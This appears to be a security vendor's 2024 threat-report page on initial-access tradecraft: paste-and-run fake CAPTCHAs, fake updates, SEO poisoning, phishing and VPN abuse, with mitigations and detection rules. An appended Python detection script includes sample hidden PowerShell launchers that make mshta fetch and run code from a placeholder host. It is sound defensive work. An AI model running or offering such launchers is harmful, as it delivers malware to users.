Initial access tradecraft

Sketchy CAPTCHAs, fake updates, social engineering, and more; adversaries continued their masquerading, tricking users throughout 2024.

Analysis

In 2024, adversaries used a wide range of methods to access and mislead unsuspecting victims. Users had to contend with malicious links and phishes presented in a multitude of ways, including via email, search engines, Microsoft Teams messages, and phone calls. “Paste and run,” a technique used to fool users into running malicious code, grew in popularity in the second half of the year. Adversaries used this method to obtain legitimate credentials and leveraged them to great effect, particularly for virtual private network (VPN) access.

Paste and run away

One of the most successful new initial access techniques we observed this year was paste and run, also known as “ClickFix” and “fakeCAPTCHA.” In the last half of the year, it became clear that this was an effective method of luring victims into executing malicious PowerShell code. Red Canary first observed the technique in August 2024, although other researchers reported seeing it in use as early as March 2024. Proofpoint coined the commonly used moniker ClickFix to initially describe the ClearFake cluster and TA571’s use of this technique. They subsequently expanded the term as they observed it being used by additional actors. At Red Canary we chose to refer to the technique in general as “paste and run,” since not all of the lures involve a “fix” of some kind.

Different styles of lures have been reported, including a phishing lure, where the victim has to copy-paste-run the code to “fix” their access to something, like a document or a video meeting:

Figure: Paste and run lure preventing access to a Microsoft Word document (image courtesy of Proofpoint)

Adversaries have also employed this technique via compromised websites with browser injects, posing either as fake CAPTCHAs to access the site or as a page loading error requiring a “fix” to display the page:

Figure: Fake CAPTCHA lure (image courtesy of https://bbs.kanxue.com/)

To give an example using the fake CAPTCHA style lure—which has been the lure we have most frequently observed—users are presented with the typical “Verify you are human” prompt with an “I’m not a robot” button. Clicking the button covertly copies an obfuscated PowerShell command to the clipboard and presents the user with “verification steps,” instructing them to:

  • Press Windows button + R (the keyboard shortcut for the Windows Run dialog)
  • Press CTRL + V (to paste the previously copied PowerShell command, which the user likely does not realize was copied)
  • Press Enter (execute the command)

An encoded PowerShell command then leverages Microsoft HTML Application Host (mshta.exe) to download and execute a malicious payload from a remote resource. Red Canary has observed multiple different payloads delivered via this technique, with LummaC2 being the most common payload. We’ve also seen HijackLoader, NetSupport Manager, Stealc, and CryptBot. Publicly reported payloads include DarkGate, Rhadamanthys, and Vidar, with some researchers observing a complex multi-layered execution chain delivering three or more payloads.

Web trends

Fake browser updates

Threats leveraging fake browser updates as an initial access vector, while not at all new, have increased in scope and frequency over the past couple of years and 2024 was no exception to this trend.

Figure: SocGholish and Scarlet Goldfinch detections from 2022-2024

Fake browser updates abuse users’ trust by tricking victims into downloading malicious executables posing as important browser updates. Chromium-based browsers are frequently targeted, but Firefox and other browser types are also taken advantage of.

This technique is currently employed by a number of threats, including SocGholish, Scarlet Goldfinch, FakeSG/Rogue Raticate, and ClearFake. Other threats have also used this technique (albeit less commonly), including Yellow Cockatoo and Fakebat, among others.

SEO poisoning

Search engine optimization (SEO) poisoning remained an effective technique for gaining initial access in 2024. Adversaries create malicious websites that use SEO techniques, such as placing strategic search keywords in the body or title of a webpage, in an attempt to rank their malicious sites above legitimate ones in results returned by Google and other search engines. The malicious sites may present whatever lure the adversary wants to use, including a fake software installer, a document download, or one of the fake browser updates mentioned above.

Malvertising

SEO poisoning is not the only way adversaries use search engines to their advantage. Malicious advertising, also called “malvertising,” is the use of fake ads on search engine result pages. These ads masquerade as legitimate websites for downloading software like QuickBooks, Grammarly, Microsoft Teams, Zoom, and more. They can also masquerade as various software updates.

Phishing trends

Phishing remains a popular method for adversaries as they attempt to gain access to victim systems. As users communicate in more ways, the types of phishing expand with them. Email phishing attacks increased in 2024, as did QR code phishing (aka “quishing”), SMS phishing, and voice phishing. Paired with social engineering, this can become a highly effective method of gaining system access. In one notable example in 2024, Black Basta affiliates paired email bombing campaigns with social engineering, posing as IT personnel “helping” with the email issue, to ultimately gain access and install remote monitoring and management (RMM) tools.

Vulnerability exploitation

As has been the case in previous years, adversaries exploited vulnerabilities for initial access in 2024. Two major examples we observed this year were CVE-2024-1709 and CVE-2024-1708, affecting ConnectWise ScreenConnect, and CVE-2023-48788, a Fortinet FortiClient EMS vulnerability. For more information on these vulnerabilities, vulnerability exploitation, and what organizations can do to address it, check out the Vulnerabilities trend page.

VPN abuse

In late August 2024, Red Canary observed ransomware incidents that leveraged virtual private networks (VPN), both as an initial access vector and to facilitate further access within organizations. Some of the activity we saw shares significant overlaps with activity tracked by Microsoft as Storm-0844. Historically tied to Akira ransomware, Storm-0844 has recently made a switch to deploying FOG ransomware. Reporting on Akira and FOG emphasizes the consistent targeting of VPN software—notably Cisco ASA—for initial access, both in recent cases and in previous attacks from more than a year ago. Akira and FOG are not the only threats that use VPNs during their attacks. For more information, check out the VPN abuse trend page.

Take action

Paste and run

We strongly encourage increasing user education and awareness around the paste and run technique. Any pop-up window or prompt—whether it’s a CAPTCHA or a “fix” of some kind—that asks users to press the Windows button + R (the keyboard shortcut for the Windows Run dialog), followed by pressing CTRL + V (to paste the unknowingly copied PowerShell command) is almost certainly malicious.

Additional mitigation steps organizations may want to consider include disallowing access to the Run dialog or even disabling the use of cmd.exe and powershell.exe for standard users in your organization. If you choose this path, be sure to only apply the policies to users that do not require these tools for administration and troubleshooting.

Fake updates

Mitigation strategies for fake update-style lures can be challenging. We want users to keep their software and browsers updated for security purposes, so discouraging them from doing so altogether is not ideal. Most browsers automatically update or have a very specific way they will prompt the user for an update. Ensure users are aware of the legitimate update procedures for their browser of choice. Most popular browsers will not prompt with a pop-up ad that reroutes the user to an unfamiliar URL location. Also ensure users are aware of software installation and update procedures for their endpoints.

Another strategy to mitigate the effects of SEO poisoning and fake updates, which we have shared before, is to update group policy object (GPO) settings for users to make scripts open in Notepad, which stops the execution chain for script-using threats like SocGholish and Scarlet Goldfinch in their tracks.

VPN exploitation

We’ve previously shared some guidance for hardening VPN appliances, and here are some rapid response steps you can take as well:

  • Even when these incidents begin on the appliances, adversaries must move further into the network to continue their operations. If your VPN controls allow for it, disable layer 2 (east-west) visibility for VPN clients, which limits what a threat actor can reach from a compromised VPN session.
  • To improve your visibility, deploy endpoint detection and response (EDR) sensors across all systems capable of running them. Deploying sensors across your enterprise increases the likelihood of earlier detection. Unmonitored endpoints provide a blind spot for adversaries to operate and make detection far more difficult.

Vulnerabilities

Some of the best ways to minimize the risk of vulnerability exploitation in your environment include:

  • patching regularly
  • maintaining an up-to-date asset inventory to let you know if the affected product is present in your environment
  • being aware of your surface area and what is exposed to the internet

Detection opportunities

Detection opportunity: mshta.exe utility making external network connections

This pseudo detection analytic identifies when mshta.exe is used to make external network connections. Adversaries, like those leveraging paste and run, can use mshta.exe to proxy the download and execution of malicious files. Sometimes mshta.exe is used this way legitimately, so you may need to research how often the command appears in your environment and the reputation of the domain involved.

process == (mshta)
&&
deobfuscated_command_line_includes (http: || https:)

Detection opportunity: scripts executed from the Explorer.exe zip function

This pseudo detection analytic identifies scripts executed from the built-in Explorer.exe zip folder function. Threats like SocGholish and Scarlet Goldfinch sometimes use malicious scripts compressed via a zip file as a form of packing in order to evade network-based security. This kind of analytic may be too noisy if your environment commonly uses scripts to compress and share reports.

process == (wscript)
&&
command_line_includes == ('users' || 'temp')
&&
command_line_includes == ('.zip' || '.js' )
&&
has_external_netconn
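As an added example, not code from the Red Canary report, the script below covers both the paste and run chain described earlier (an encoded PowerShell command that launches mshta.exe against a remote URL) and the two pseudo detection analytics above. It decodes a PowerShell -EncodedCommand blob (base64 over UTF-16LE), which is what the deobfuscated_command_line field implies, and then applies both rules to a handful of constructed process-start events. The event schema, field names, domain names and IP addresses are assumptions; the destination addresses are taken from documentation ranges. It also goes slightly beyond the first analytic: a powershell.exe launcher whose decoded command line calls mshta with a URL matches too, since that is where a paste and run payload hides the URL before mshta.exe is ever spawned.

```python
"""Added example (not Red Canary's code): decode a paste-and-run PowerShell
launcher and apply this page's two pseudo detection analytics to constructed
process-start events. Event schema, names, domains and IPs are assumptions."""
import base64
import ipaddress
import re
from dataclasses import dataclass, field

# -EncodedCommand and the abbreviations PowerShell accepts for it. The flag
# list is explicit so that "-ep bypass" is never mistaken for an encoded blob.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
URL_SCHEME = re.compile(r"https?:", re.IGNORECASE)

# RFC 1918, loopback and link-local count as internal; add your own ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "fc00::/7", "fe80::/10", "::1/128")]


@dataclass
class ProcessEvent:
    image: str                    # executable name, e.g. "mshta.exe"
    command_line: str
    parent_image: str = ""
    netconn_dst: list = field(default_factory=list)  # destination IPs seen


def build_encoded(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def deobfuscate(cmdline: str) -> str:
    """Replace any -EncodedCommand blob with its decoded UTF-16LE text.

    Undecodable blobs are left in place so the rule still sees the raw text.
    """
    def _decode(m):
        try:
            return " " + base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
    return ENC_FLAG.sub(_decode, cmdline)


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def has_external_netconn(ev: ProcessEvent) -> bool:
    return any(is_external(ip) for ip in ev.netconn_dst)


def rule_mshta_external(ev: ProcessEvent) -> bool:
    """process == mshta && deobfuscated_command_line_includes (http: || https:).

    Extension beyond the page: a launcher (e.g. powershell.exe -enc) whose
    decoded command line calls mshta with a URL also matches.
    """
    decoded = deobfuscate(ev.command_line)
    involves_mshta = ev.image.lower() == "mshta.exe" or "mshta" in decoded.lower()
    return involves_mshta and URL_SCHEME.search(decoded) is not None


def rule_wscript_zip(ev: ProcessEvent) -> bool:
    """process == wscript && cmdline has users|temp && .zip|.js && external netconn."""
    if ev.image.lower() != "wscript.exe":
        return False
    cl = ev.command_line.lower()
    return (any(t in cl for t in ("users", "temp"))
            and any(t in cl for t in (".zip", ".js"))
            and has_external_netconn(ev))


RULES = {"mshta external": rule_mshta_external,
         "wscript from Explorer zip": rule_wscript_zip}


def run_rules(events):
    """Return (rule name, event index) for every rule that fires."""
    return [(name, i) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


# Constructed events: a paste-and-run launcher, the mshta.exe it spawns, a
# benign local HTA, a script run from an Explorer zip temp folder (Explorer
# extracts to %TEMP%\Temp1_<name>.zip\), and a benign script with no external C2.
SAMPLE_EVENTS = [
    ProcessEvent("powershell.exe", "powershell.exe -w hidden -ep bypass -enc "
                 + build_encoded("mshta https://captcha.example.invalid/verify.hta"),
                 parent_image="explorer.exe"),
    ProcessEvent("mshta.exe", "mshta.exe https://captcha.example.invalid/verify.hta",
                 parent_image="powershell.exe", netconn_dst=["203.0.113.10"]),
    ProcessEvent("mshta.exe", r"mshta.exe C:\Program Files\Vendor\setup.hta",
                 parent_image="msiexec.exe"),
    ProcessEvent("wscript.exe",
                 r'wscript.exe "C:\Users\alice\AppData\Local\Temp\Temp1_Update.zip\Update.js"',
                 parent_image="explorer.exe", netconn_dst=["198.51.100.7"]),
    ProcessEvent("wscript.exe", r'wscript.exe "C:\Users\alice\Documents\report.js"',
                 parent_image="explorer.exe", netconn_dst=["10.0.0.5"]),
]

if __name__ == "__main__":
    for name, i in run_rules(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        print(f"[{name}] {ev.image}: {deobfuscate(ev.command_line)}")
```

Running it prints three hits: the powershell.exe launcher and the mshta.exe child both trip the mshta rule once the encoded command is decoded, and the wscript.exe run from the Temp1_*.zip folder trips the zip rule because its destination is outside the internal ranges. The local HTA and the script that only talks to 10.0.0.5 stay quiet, which is the kind of noise reduction the page warns you will need when scripts are a normal part of the environment.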

Testing

Start testing your defenses against initial access tradecraft using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.

Getting started

Atomic Red Team boasts many different ways of emulating initial access activity across many different ATT&CK techniques. The following techniques are a good starting point for most security teams seeking to validate their detective controls:

Review and repeat

Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:

  • Were any of your actions detected?
  • Were any of your actions blocked or prevented?
  • Were your actions visible in logs or other defensive telemetry?

Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.
